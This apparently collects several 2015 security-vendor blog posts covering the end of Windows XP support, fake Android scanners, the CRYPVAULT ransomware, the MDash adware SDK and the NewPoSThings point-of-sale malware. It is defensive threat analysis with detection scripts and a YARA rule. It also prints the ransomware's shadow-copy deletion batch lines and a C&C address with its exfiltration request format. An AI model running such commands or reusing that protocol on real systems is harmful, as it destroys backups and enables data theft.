
    Support for Windows XP ended over a year ago. By any standard, Windows XP ranks as one of the most influential versions of Windows ever, thanks to its longevity and widespread adoption by enterprises around the world. However, the end of support should have served as a clear signpost to users and organizations to immediately upgrade to newer systems.

    A year later, remarkably, Windows XP isn’t quite dead yet. Its exact share can be debated. Net Market Share data suggests its share as of March 2015 is at around 17%. StatCounter has this figure at over 11%. Analytics data from US government websites can be used to get an estimate as well; this data places XP market share at just under 5%.

    The risks to Windows XP have not gone away, either. A year’s worth of vulnerabilities that may affect Windows XP have not been patched—only once did Microsoft publicly release a patch for a Windows XP zero-day vulnerability. In addition, various security upgrades for later versions of Windows have not been retrofitted to Windows XP: a good example is Control Flow Guard, which is only available in Windows 8.1 Update 3 (from November 2014) and in Windows 10 (currently in Technical Preview).

    Support for Windows Server 2003 to end in July

    In just under three months, however, IT administrators will have to do the upgrade dance again. Windows Server 2003’s support will end in July this year. A survey of IT professionals by Spiceworks outlined the scale of the issue. 61% of organizations still have at least one instance of Server 2003 running; and only 15% of respondents indicated that their organizations had completed migration. Of those who plan to have some Server 2003 systems active even after the end of support, almost everyone (85%) indicated that security risks were a concern.

    As with Windows XP, we highly recommend that organizations prepare and implement migration plans—if they haven’t already. The potential risks here are even greater, considering servers are the systems at risk.

    Available solutions and recommendations

    Users running unpatched systems are advised to enable the Enhanced Mitigation Experience Toolkit (EMET) on their Windows systems. EMET is a free tool by Microsoft designed to protect Windows systems even against new and undiscovered threats.

    Additionally, users who cannot upgrade to newer Windows versions are still protected against threats with our security solutions. Trend Micro Deep Security and Vulnerability Protection are both able to detect threats before they reach user systems. Trend Micro Endpoint Application Control can also lock down systems by preventing unwanted and unknown applications and processes from running.

    Deep Security will support Windows 2000 until 2017 and Windows 2003 and XP until 2020. In addition, our endpoint products will continue to be supported for these older Windows versions until 2016.

     

    Mobile users became alarmed after the discovery of an Android bug that was dubbed as the “Android Installer Hijacking vulnerability.” This flaw can allow cybercriminals to replace or modify legitimate apps with malicious versions that can steal information. Given the high profile nature of this discovery, we decided to search for threats that might exploit this vulnerability.

    A scanner app was released so that users can check if their mobile devices were affected by the Android Installer Hijacking vulnerability. We thought cybercriminals might take advantage of this news and create their own malicious version of the app. However, the malware we did encounter were of a different nature.

    Visiting the Sites

    Using relevant keywords, we came across three websites that advertise “scanners” for the Android vulnerability, with some even using the name of the actual, legitimate scanner.

    First Website

    The first site features two options to download the .APK scanner file. Clicking on any of the two options leads to a site before finally redirecting to the official Google Play page of the scanner app.


    Figure 1. First site “offering” the scanner via two options


    We uncovered a new crypto-ransomware variant with new routines that include making encrypted files appear as if they were quarantined files. These files are appended with a *.VAULT file extension, alluding to an antivirus software service that keeps any quarantined files for a certain period of time. Antivirus software typically quarantines files that may potentially cause further damage to an infected system.

    Infection chain

    Arrival Vector

    The malware arrives on affected systems via an email attachment. When users execute the attached malicious JavaScript file, it will download four files from its C&C server:

    • Crypto-ransomware detected as BAT_CRYPVAULT.A
    • SDelete – Microsoft Sysinternals tool (will be renamed to audiodg.exe by the malware)
    • GnuPG – executable open-source encryption tool (will be renamed to svchost.exe by the malware)
    • Library file of GnuPG (will be renamed to iconv.dll by the malware)

    The script will execute the crypto-ransomware after downloading the files mentioned above. The downloaded files are then saved in the %User Temp% folder.

    Figure 1. Email attachment named – Akt_Sverki_za_2014_year_Buhgalterija_SIGNED-ot_17.02_2015g_attachment.AVG.Checked.OK.pdf.js

    I observed that the cybercriminals may have purposely added strings found in known virus scanner logs (such as in AVG, Microsoft, etc.) in order to bypass their scan engines.

    Encryption Routine

    Upon execution, the malware installs an open source encryption tool called GNU Privacy Guard (GnuPG) into the affected system, which starts the encryption process. This file will generate an RSA-1024 public and private key pair used in the encryption of user files.

    Figure 2. Generated files of GnuPG (private – secring.gpg and public – pubring.gpg)

    It then looks for files to encrypt. The file extensions it targets are as follows:

    • *.xls
    • *.doc
    • *.pdf
    • *.rtf
    • *.psd
    • *.dwg
    • *.cdr
    • *.cd
    • *.mdb
    • *.1cd
    • *.dbf
    • *.sqlite
    • *.jpg
    • *.zip

    Figure 3. The malware searches for files from its list of file extensions and encrypts them using a file dropped by the malware called svchost.exe (a GnuPG executable)

    The malware avoids this list of folders to avoid system malfunction:

    • abbyy
    • adobe
    • amd64
    • application
    • autograph
    • avatar
    • avatars
    • cache
    • clipart
    • com_ intel
    • common
    • csize
    • framework64
    • games
    • guide
    • internet
    • library
    • manual
    • maps
    • msoffice
    • profiles
    • program
    • recycle
    • resource
    • resources
    • roaming
    • sample
    • setupcache
    • support
    • template
    • temporary
    • texture
    • themes
    • thumbnails
    • uploads
    • windows

    After encrypting the user’s files, the malware will then append a *.vault file extension.

    Ransom Notes

    The malware uses the following script to make the affected system display the ransom note when the file is opened:

    Figure 4: Script used by the malware to display the ransom note


    After encryption, the malware will change all associated *.vault file extensions to padlock icons. Each “locked” and encrypted file will display a ransom note when opened, as displayed in the image below.

    Figure 5. Opening any of the files encrypted by BAT_CRYPVAULT.A leads to a ransom note displayed by VaultCrypt. Users will need to upload the Vault key file that the malware drops in the desktop folder to gain access to the site.

    The malware also drops a .TXT file and displays a message on the infected system’s desktop instructing users on how to pay the ransom price in order to decrypt the files. We observed that this particular attack appears to target users in Russian-speaking countries as the attached file name, ransom note, and ransomware support portal are all in Russian.

    Figure 6. The dropped file VAULT.txt written in Russian is found in the Desktop folder. It provides instructions on how to decrypt the files.

    Figure 7. Ransom note via an HTML executable file (.HTA file) that is displayed on infected system’s desktop after the encryption of user’s files

    Deleting backup, traces of encryption, and malware components

    The malware deletes the key files secring.gpg, vaultkey.vlt and confclean.lst by using sDelete, a Microsoft Sysinternals tool. sDelete is capable of overwriting a deleted file’s disk data, which makes it difficult or nearly impossible to recover deleted files.

    Though this isn’t the first time we’re seeing SDelete being used in crypto-ransomware attacks, it appears that this is a first for malware to use 16 overwrite passes to make sure that recovery tools will have a hard time trying to reconstruct the deleted file. This file arrives in the affected system together with the ransomware.

    Figure 8. Key files deleted that were used in the encryption process

    Figure 9. The malware deletes the key files using sDelete

    The malware deletes shadow volume copies if they exist in the system.

    echo Set objShell = CreateObject^("Shell.Application"^) > "%temp%\win.vbs"
    echo Set objWshShell = WScript.CreateObject^("WScript.Shell"^) >> "%temp%\win.vbs"
    echo Set objWshProcessEnv = objWshShell.Environment^("PROCESS"^) >> "%temp%\win.vbs"
    echo objShell.ShellExecute "wmic.exe", "shadowcopy delete /nointeractive", "", "runas", 0 >> "%temp%\win.vbs"

     Figure 10. The malware deletes its components at the end of its routine
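    The behaviours described above (GnuPG running as svchost.exe and SDelete as audiodg.exe from the temp folder, plus shadow copy deletion through wmic) can be hunted for in process-creation telemetry. The following is an added detection example, not code from the original post; the event field names, host names and sample command lines are constructed assumptions.

```python
import ntpath
import re

# Per the write-up: GnuPG is dropped as svchost.exe and SDelete as audiodg.exe.
# The genuine Windows binaries with those names run only from these folders.
MASQUERADED_NAMES = {"svchost.exe", "audiodg.exe"}
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}

SHADOW_DELETE = re.compile(r"\bshadowcopy\s+delete\b", re.IGNORECASE)
GPG_OPTION = re.compile(r"--(?:batch|gen-key|encrypt|recipient)\b", re.IGNORECASE)
SDELETE_PASSES = re.compile(r"(?:^|\s)[-/]p\s+(\d+)\b", re.IGNORECASE)

# Constructed process-creation events (shape assumed; map the field names to
# your EDR or Sysmon Event ID 1 export). Command lines are illustrative.
SAMPLE_EVENTS = [
    {"host": "PC-07", "image": r"C:\Windows\System32\svchost.exe",
     "command_line": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"host": "PC-07", "image": r"C:\Users\alice\AppData\Local\Temp\svchost.exe",
     "command_line": r"svchost.exe --batch --recipient KEYID --encrypt C:\docs\plan.xls"},
    {"host": "PC-07", "image": r"C:\Users\alice\AppData\Local\Temp\audiodg.exe",
     "command_line": r"audiodg.exe -p 16 secring.gpg"},
    {"host": "PC-07", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "command_line": "wmic.exe shadowcopy delete /nointeractive"},
    {"host": "PC-12", "image": r"C:\Windows\System32\audiodg.exe",
     "command_line": r"C:\Windows\System32\audiodg.exe 0x2f4"},
]


def classify(event):
    """Return the suspicious traits of one process-creation event."""
    image = event["image"].lower()
    cmd = event["command_line"]
    name = ntpath.basename(image)
    tags = []
    if name in MASQUERADED_NAMES and ntpath.dirname(image) not in SYSTEM_DIRS:
        tags.append("masquerade")  # system binary name, non-system folder
        if name == "svchost.exe" and GPG_OPTION.search(cmd):
            tags.append("gpg-as-svchost")
        passes = SDELETE_PASSES.search(cmd)
        if name == "audiodg.exe" and passes:
            tags.append(f"sdelete-overwrite:{passes.group(1)}")
    if name == "wmic.exe" and SHADOW_DELETE.search(cmd):
        tags.append("shadowcopy-delete")
    return tags


def triage(events):
    """Alert on hosts that show masquerading together with a destructive step."""
    by_host = {}
    for event in events:
        by_host.setdefault(event["host"], set()).update(classify(event))
    alerts = {}
    for host, tags in by_host.items():
        destructive = any(
            t == "shadowcopy-delete" or t.startswith("sdelete-overwrite")
            for t in tags
        )
        if "masquerade" in tags and destructive:
            alerts[host] = sorted(tags)
    return alerts


if __name__ == "__main__":
    for host, tags in triage(SAMPLE_EVENTS).items():
        print(host, tags)
```
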

    Downloads info-stealing malware

    The malware also downloads and executes a hacking tool called Browser Password Dump by SecurityXploded from its C&C server. The tool is capable of extracting stored login passwords from the following web browsers:

    • Mozilla Firefox
    • Internet Explorer
    • Google Chrome
    • CoolNovo
    • Opera Browser
    • Safari
    • Flock
    • SeaMonkey
    • SRWare Iron
    • Comodo Dragon

    After execution of the tool, the malware resumes control and drops a visual basic script called up.vbs that will upload the password dump report back to the C&C server.

    Conclusion

    We’ve also noticed that despite being a new crypto-ransomware variant, CRYPVAULT appears to possess limited functionalities, as it is not coded using a programming language; rather, it was written as a batch script. It also doesn’t import any libraries or create functions, and the components that come with the malware carry out the bulk of its malicious routines. This shows how easy it is for cybercriminals to create new crypto-ransomware variants.

    Ransomware is becoming the next big thing that the threat actors create. Making important user files unusable forces more people to pay the ransom. As more ransomware appear in the wild, it is advised to back up files on a regular basis.

    Related hashes:


    Update as of April 7, 2015, 11:00 P.M. PST:
    We have edited the first paragraph of the entry to clarify a statement about the quarantined files.

    Credit goes to keydet89 (@keydet89), Ryan Kazanciyan (@ryankaz42), and InfoSec Taylor Swift (@SwiftonSecurity) for initiating a discussion about the description of the files.

     

    Just last month, there were reports that Google removed three apps from its Play Store as they were discovered to be adware in disguise. At the time of the discovery, the apps were said to have been downloaded into millions of devices, based on data from the app stores. However, these were not the only apps with similar behavior. During their investigation in early March, our researchers believe that there were over 2,000 apps with similar behavior on Google Play. However, this number has decreased to the hundreds, if not fewer.

    The Adware MDash

    The adware, detected as ANDROIDOS_ADMDASH.HRX, is an SDK integrated into all of those apps. While it is sometimes called “MobiDash,” we will refer to this adware as “MDash” in this entry. What’s puzzling is that there isn’t any readily available information about this SDK that turned up in our research. It’s highly likely that the SDK was privately published—which is a stark contrast from famous adware vendors who often publish and facilitate the integration of their SDKs to earn as much as they can.

    If the SDK was privately published, then how did it reach the app developers? It’s possible that it was distributed in underground forums.

    A Look at MDash’s Code

    To analyze MDash, we selected an app with the package com.zigzag.tvojdekor. It’s a Russian app that has since been removed from the Lifestyle category on Google Play. Examining the app, we found that the adware SDK MDash was carefully developed and well-maintained.


    Figure 1. Sample app with MDash SDK


    Figure 2. MDash SDK source structure

    When the app is launched, a configuration file disguised in .PNG format is parsed:


    Figure 3. Parsing a local configuration file (highlighted), which is disguised in PNG format

    When we opened the file using a text editor program, we found that there is another remote configuration file, located on a domain registered to a Russian organization in St. Petersburg.


    Figure 4. Opening the disguised configuration file reveals a URL


    Figure 5. Remote configurations on a private host

    The app initiates the adware SDK when two conditions are met: 1) the remote configuration has the keyword Pl3Sdk, and 2) its value is “true.”


    Figure 6. Conditions set for MDash SDK


    Figure 7. Default configurations on the remote private host shows that the conditions are always met

    Presenting Ads After Screen Unlocks

    During installation, this app sets configurations for a so-called “Overapp” ad, possibly installing shortcuts and a home page for the ad. According to the remote configuration details, the Overapp service will start only after a delay of 288,000 seconds (over three days). The delay could be so as not to arouse any suspicion once the app is installed.


    Figure 8. Initializing MDash SDK

    Looking into the ad service DisplayCheckService in the code, we see that a broadcast receiver is registered to receive “SCREEN_OFF” events. During “SCREEN_OFF,” the service will send a request to the remote site to get ads. Once the user unlocks the phone, an ad will pop up.


    Figure 9. Code showing the request to get ads

    The service also sets up alarms to check and start itself every 15 minutes.

    Ads Displayed

    There are several types of ads supported by the SDK. But compared to other ad vendors, there are four distinct ad types in this SDK that deserve focus:

    • Alert – shows the ad in an alert dialogue box
    • Recommendation – presented as a recommendation by someone in the user’s contact list
    • Link – presents a pop-up message, that when clicked, opens the browser to display the ad
    • SDK – loads other popular ad SDKs to show ads


    Figure 10. Sample “link” ad

    Monitoring the ads being displayed, we found that they lead to unwanted apps, scams, and even malware. We found that one “update” was really adware, detected as ADW_ADGAZELLE. It’s worth noting that the malware affects computers, not mobile devices.


    Figure 11. Other sample ads

    Continuous Updates, Improvements

    While examining other apps, we found that the MDash SDK is frequently updated, with new features being continuously developed.

    For example, the app “Winter Bunny – Joyfull DressUp” contains a version of the MDash SDK that contains code to make silent calls in the background, without any user consent.  The number it calls is dynamically deployed from the remote server. The SDK contains code to delete the device’s call history to hide the suspicious activity.


    Figure 12. This app can make calls without user consent


    Figure 13. Code snippet of MDash SDK to make background calls

    However, the app doesn’t request the necessary permissions to make the phone calls. This means that potentially fraudulent calls cannot occur.

    We have also seen other versions of the MDash SDK search for and create a list of all the installed apps on an infected device. The information is then sent to a remote server, with the goal of deploying ads promoting similar apps.


    Figure 14. Collecting information about installed apps

    When Ads Turn into Adware

    Analyzing the implementation of the SDK, we found that the routines of the SDK could be enabled or disabled from the remote configuration server. At the time of analysis, these routines were enabled by default in the majority of the apps. But re-checking the remaining apps, we found that the backend ad server is currently not deploying ads.


    Figure 15. Ad deployment was disabled

    While this bit of news might seem like a relief for users, they shouldn’t rest easy. Even if the adware behavior is temporarily disabled, there is no guarantee that the developer will not suddenly activate or enable the behavior again. Regardless of the status, users are always at risk since the SDK can be found in their apps.

    Of course, there are other checks that might prevent malicious or suspicious behavior from an app. For example, an app cannot make calls unless it contains the necessary permission (that was given by the user). However, this SDK shows that it can easily change from displaying ads to becoming adware by a simple change in the manifest file.

    Looking at Developers

    We extracted over 1,300 unique certificates signed to these apps. Based on the certification details, about a thousand of them are from Russian developers. Furthermore, about 1,100 certificates appear to have been filled with similar descriptions. The organization “TrueAndroid” seems to be a major contributor to the certificates. However, we cannot vouch for the veracity of the information found in these certificates. Developers can fill out the certificate information with random words as they see fit.

    Of course, we cannot say for certain that these app developers also contributed to the development of the MDash SDK. However, we do know that they were able to acquire and integrate the said SDK to their apps, placing millions of users at risk of adware and other threats.

    These kinds of SDKs are a good reason for developers to check SDKs before integrating them into their apps. Well-meaning app developers might find themselves earning the ire of the public if they unknowingly incorporated SDKs like MDash in their apps.

    We advise users to download apps from known and trusted developers only. App stores do not always assume the responsibility of proactively checking for malicious or suspicious apps, so users should always take the initiative when it comes to protecting their devices. It pays to read reviews of apps to make sure they perform as intended. Reading reviews might help filter out apps that might have been overlooked during security checks. Lastly, users should have a security solution like Trend Micro Mobile Security installed in their mobile devices to detect and block potential threats.

    With additional analysis by Kenny Ye.

    We have notified Google about these affected apps. As of this writing, the majority of the apps—including the Russian and “Winter Bunny – Joyfull DressUp” apps—have been removed from Google Play.

    Hashes of the affected apps can be found in this document.

     

    Apr 1, 2:11 pm (UTC-7)

    Arbor Networks initially posted about a new point-of-sale (PoS) malware family named NewPosThings last September, which we detect as either TSPY_POSNEWT.SM or TSPY_POSNEWT.A. We are now seeing new developments in this area—namely, versions for 64-bit and higher.

    The 64-bit version is out

    Similar to the previous 32-bit version reported last year, the 64-bit sample is a multifunction Trojan that includes added functionalities and routines. These include RAM scraper capabilities, keylogging routines, dumping virtual network computing (VNC) passwords, and information gathering.

    Installation

    When the malware installs itself, it follows a specific algorithm to decide which file name to use.

    1. First, get a base value that is based on the volume serial number and computer name
    2. Using its own function, it calculates the base value to get the final value
    3. Finally, select a file name from the output of step #2 mod 5

    FileName = Array of FileName[Final Value % 5]

    Depending on the output, the file name selected can be:

    • Java\Javaj.exe
    • lsm\lsm.exe
    • svchost\svchost.exe
    • dwm\dwm.exe
    • lsasss\lsasss.exe

    To maintain persistence, it registers itself as a startup item named “Java Update Manager” when it starts, and then restarts another process with “RM” parameters.

    Figure 1. The 64-bit NewPoSThings registers itself as Java Update Manager

     

    This new process then searches for stored VNC passwords (WinVNC, RealVNC, UltraVNC and TightVNC), which it acquires immediately.

    Figure 2. Building the list of stolen VNC passwords. It is also seen to disable security warnings for specific extensions (.exe/.bat/.reg/.vbs)

    Figure 3. Disabling security warning for specific file types

     Disabling the Open File Security Warning of Microsoft Windows reduces the overall security posture of the Microsoft Windows host operating system. This is because the system no longer prompts the user for validation when opening up files that could have been downloaded from malicious sources.

    Main malware routines

    After installation, it starts several threads to execute different tasks:

    • RAM Scraper Thread

    Similar to other RAM scrapers, it enumerates all processes while skipping a whitelist, and searches for a specific pattern. Once it finds a target process, a thread is created to extract credit card numbers from memory. This process, while being simple and straightforward, is not so efficient as there may be a tendency for this RAM scraper to consume all CPU resources if the computer has a lot of running processes.

    Figure 4. Process enumeration routine

    Figure 5. Process White List

     

    The search pattern is “[0-9]*(=|^).” If a number string is found, it is validated with the Luhn algorithm, and each valid credit card number is stored in memory and then passed to the transfer thread.

    • Keylogger Thread

    A hidden window “kl” is created in the background to collect user input. The data will be preserved in memory, and will not be written to a physical file.

     Figure 6. Creation of hidden window “kl”

    • Keep-Alive Thread

    When the victim computer is online, this thread will report to its C&C server every 300 seconds, or five minutes.

    • Transfer Thread

    This thread will check every 600 seconds (or 10 minutes) if the data transfer is ready. Once ready, it will send the data to its C&C server.

    Data Exfiltration

    For this POS RAM scraper, the method of data exfiltration is via HTTP, and the context really depends on the data being collected.

    C&C Server: 80.82.65.112:80
    Protocol: HTTP
    User-Agent: Mozilla/4.0(compatible; MSIE 7.0b; Windows NT 6.0)
    Method: POST, example: cs=aW5zZXJ0&p=Windows+7+64+TEST&m=53852938&v=1.0

    The parameters being sent can be any of the following:

    • Parameter: cs

      Value    | Type                      | Remark
      cGFzcw   | Send Stolen VNC Password  | TightVNC/WinVNC/UltraVNC/RealVNC
      aW5zZXJ0 | Report Client Information | OS + Computer Name + Client Version
      bG9n     | Keep Alive                | Ping!
      a2xvZw   | Send Log Data             | Key logger + Credit Card Number

    • Parameter: p – (OS Version)+(Platform)+(Computer Name)
    • Parameter: m – Session ID
    • Parameter: v – Client Version, a fixed value (1.0 in this case)
    • Parameter: ls – Stolen Data
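    One way to hunt for this traffic in proxy logs, as an added example that is not part of the original post: it checks each POST for the listed User-Agent, the /connect/<n> URL path and a known cs value, and flags sources whose keep-alive posts recur at the 300-second interval. The log format, field names, host addresses and thresholds are assumptions.

```python
import base64
import binascii
import json
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Indicators taken from the write-up above.
USER_AGENT = "Mozilla/4.0(compatible; MSIE 7.0b; Windows NT 6.0)"
CONNECT_PATH = re.compile(r"^/connect/\d+$")
CS_TYPES = {
    "cGFzcw": "Send Stolen VNC Password",
    "aW5zZXJ0": "Report Client Information",
    "bG9n": "Keep Alive",
    "a2xvZw": "Send Log Data",
}
KEEPALIVE_SECONDS = 300  # interval of the keep-alive thread

# Constructed sample: assumed proxy export, one JSON object per line, "ts" in
# epoch seconds. 198.51.100.7 is a documentation address standing in for a C&C.
_BAD = {"src": "10.0.5.21", "method": "POST", "ua": USER_AGENT,
        "url": "http://198.51.100.7/connect/2"}
SAMPLE_LOG = "\n".join(json.dumps(r) for r in [
    {**_BAD, "ts": 1000, "body": "cs=aW5zZXJ0&p=Windows+7+64+TEST&m=53852938&v=1.0"},
    {**_BAD, "ts": 1300, "body": "cs=bG9n&m=53852938"},
    {**_BAD, "ts": 1601, "body": "cs=bG9n&m=53852938"},
    {**_BAD, "ts": 1899, "body": "cs=bG9n&m=53852938"},
    {"src": "10.0.5.40", "method": "POST", "ua": "Mozilla/5.0", "ts": 1200,
     "url": "http://updates.example.com/api/checkin", "body": "cs=abc&v=2"},
])


def decode_cs(value):
    """Decode an unpadded base64 cs value to text, or None if it is not base64."""
    padded = value + "=" * (-len(value) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def cs_value(record):
    """Extract the cs form field from a record's POST body ('' if absent)."""
    return parse_qs(record.get("body", "")).get("cs", [""])[0].strip()


def inspect(record):
    """Return the indicators from the write-up that one proxy record matches."""
    reasons = []
    if record.get("method") != "POST":
        return reasons
    cs = cs_value(record)
    if cs in CS_TYPES:
        reasons.append(f"cs={cs} decodes to '{decode_cs(cs)}' ({CS_TYPES[cs]})")
    if record.get("ua") == USER_AGENT:
        reasons.append("user-agent matches")
    if CONNECT_PATH.match(urlsplit(record.get("url", "")).path):
        reasons.append("URL path matches /connect/<n>")
    return reasons


def scan(log_text, min_indicators=2):
    """Return (src, ts, reasons) for records matching several indicators."""
    hits = []
    for line in filter(str.strip, log_text.splitlines()):
        record = json.loads(line)
        reasons = inspect(record)
        if len(reasons) >= min_indicators:
            hits.append((record["src"], record["ts"], reasons))
    return hits


def beaconing_sources(log_text, tolerance=0.1):
    """Sources whose keep-alive posts recur about every KEEPALIVE_SECONDS."""
    times = defaultdict(list)
    for line in filter(str.strip, log_text.splitlines()):
        record = json.loads(line)
        if cs_value(record) == "bG9n":
            times[record["src"]].append(record["ts"])
    allowed = tolerance * KEEPALIVE_SECONDS
    flagged = []
    for src, stamps in times.items():
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        if len(gaps) >= 2 and all(abs(g - KEEPALIVE_SECONDS) <= allowed for g in gaps):
            flagged.append(src)
    return sorted(flagged)


if __name__ == "__main__":
    for src, ts, reasons in scan(SAMPLE_LOG):
        print(ts, src, "; ".join(reasons))
    print("beaconing:", beaconing_sources(SAMPLE_LOG))
```
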

    The 64-bit file we examined has been able to send back version 1.0. In comparison, earlier 32-bit samples (detected as TSPY_POSNEWT.SM or TSPY_POSNEWT.A) did not send back the client file’s version, and the URL format of the C&C was different:

    64-bit v1.0 C&C:

    • http://80[dot]82[dot]65[dot]112/connect/2

    Earlier 32-bit C&C:

    • http://wordpress-catalogs[dot]com/dkok/ek[dot]php
    • http://91[dot]121[dot]87[dot]188/cms/CMS/ek[dot]php
    • http://62[dot]68[dot]96[dot]173/cdsfh/ek[dot]php

    The 64-bit C&C uses the same URL format that we see in higher versions, as we detail below.

    Growing versions

    The change in the format of the C&Cs was not the only observable change, as NewPoSThings showed new versions over the course of a few months. Each version had a minor tweak, with the most current version (version 3.0) being the most complex:

    Version 1.0

    • Disables Security Warning: Add “.exe/.bat/.vbs/.reg” to LowRisk
    • Only in 32-bit version: PDB: C:\Users\Tom\documents\visual studio 2012\Projects\jsd_12.2\Release\jsd_12.2.pdb
    • Only in 64-bit version: Sent back the client version. PDB: C:\Users\Tom\documents\visual studio 2012\Projects\jsd_12.2\x64\Release\jsd_12.2.pdb
    • Compiled within the last 2 weeks of November 2014

    Versions 2.1 – 2.3

    • Disables Security Warning: Modifying “:Zone.Identifier”
    • PDB: C:\Users\Tom\documents\visual studio 2012\Projects\jsd_12.2\Release\jsd_12.2.pdb
    • Samples seen may have been compiled during December 2014
    • Later versions, possibly generated on January 2015 already had application manifest / compatibility stated for Windows 7, and also used a custom packer.

    Version 3.0

    • Disables Security Warning: Modifying “:Zone.Identifier”
    • PDB path now totally hidden.
    • Application manifest / compatibility stated for Windows 7
    • Uses a custom packer, added some anti-debugging methods
    • Samples seen may have been compiled during the last week of January 2015

    Currently, we’ve seen repackaging of version NewPoSThings 2.x with additional malware – SHA1: ffd268bf769e0ac0ba0003ae98fb09ab12883da4, currently detected as BKDR_BEZIGATE.AI. This malware is a backdoor type which presents some interesting features:

    • First of all, it has a keylogging functionality as well as starting/stopping VNC and web camera:

    Figure 7. Features of BKDR_BEZIGATE.AI

    • Secondly, it sends feedback to its C&C server on the running processes

    The more common approach for PoS malware is to bundle it with potentially unwanted applications (PUA), also known as adware. Packaging this PoS RAM scraper provides additional control over the affected endpoint.

    Affected Parties

    While going through C&C activity we saw, there were two that stood out. We observed attempts to connect to the C&C of the newer NewPoSThings PoS malware from IP addresses of two US-based airports. Together with the recent news on the Los Angeles International Airport (LAX) credit card breach, we believe that our previous write-up about seeing PoS attacks targeting travelers may not be far from the truth. No matter which country, airports represent one of the busiest establishments where there are transactions being made all year round.

    This further reinforces the fact that PoS malware, and the threat actors behind it, may have definitely matured to branch out to targets other than large retailers or small merchants. Late 2014 we came out with a blog post that talks about these targets: Planes, Trains & Automobiles – Are You Safe From PoS Malware Anywhere?

    Recommendations and Solutions

    While Trend Micro already detects this threat, and blocks all C&Cs listed below, the following recommendations may help in this situation:

    • Assess if it is possible to segregate PoS terminals from the rest of the network, and employ correct access controls. This would help prevent the PoS terminals from being infected with malware through the network, or at least make it harder for the malware to exfiltrate the stolen data. In this case, the data scraped from the PoS terminals would not be uploaded to the C&C servers if there was no direct access to the internet to begin with.
    • If possible, employ application whitelisting technology to control which applications run in your network. This would best be done before deploying the PoS terminals, when we know that they are risk free.
    • Check if there are any ways or means to detect an infection, such as firewall or proxy logs. The use of YARA can also be an option, if PoS terminals are installed with a different antivirus solution. The indicators are provided below to help incident responders and security specialists.

    Using a multi-layered security solution within the enterprise will enable your organization to control user data while giving enterprise-wide visibility. This complete approach can help prevent PoS-related data breaches and business disruption from gateway and mobile devices. In addition, you can centrally manage threat and data policies across multiple layers of your IT infrastructure, streamline management, and provide more consistent policy enforcement. For endpoint monitoring and validation for possibly active infections, Trend Micro Deep Discovery Endpoint Sensor can use the IP address and port, as well as the YARA rule, listed below.

    Indicators

    The indicators below are compiled examples based on the observed threat.


    Here is a list of C&C locations observed:


    Here is the Yara rule:

    rule PoS_Malware_NewPOSThings2015 : newposthings2015
    {
        meta:
            author = "Trend Micro, Inc."
            date = "2015-03-10"
            description = "Used to detect NewPoSThings RAM scraper, including 2015 sample set"
        strings:
            $pdb1 = "C:\\Users\\Tom\\documents\\visual studio 2012\\Projects\\NewPosThings\\Release\\NewPosThings.pdb" nocase
            $pdb2 = "C:\\Final32\\Release\\Final.pdb" nocase
            $pdb3 = "C:\\Users\\Tom\\documents\\visual studio 2012\\Projects\\jsd_12.2\\Release\\jsd_12.2.pdb" nocase
            $pdb4 = "C:\\Users\\Tom\\documents\\visual studio 2012\\Projects\\jsd_12.2\\x64\\Release\\jsd_12.2.pdb" nocase
            $string0 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" wide
            $string1 = "Mozilla/4.0(compatible; MSIE 7.0b; Windows NT 6.0)" wide
            $string2 = "Content-Type: application/x-www-form-urlencoded" wide
            $string3 = "Use 64bit version." wide
            $string4 = "SeDebugPrivilege" wide
            $string5 = "Java Update Manager" wide
            $string6 = "Java\\Javaj.exe" wide
            $string7 = "lsass.exe" wide
            $string8 = "aW5zZXJ0"
        condition:
            // Any one PDB path is enough; otherwise all of $string0..$string8 must match
            (any of ($pdb*)) or (all of ($str*))
    }

    With additional insights and analysis from Kenney Lu and Numaan Huq

     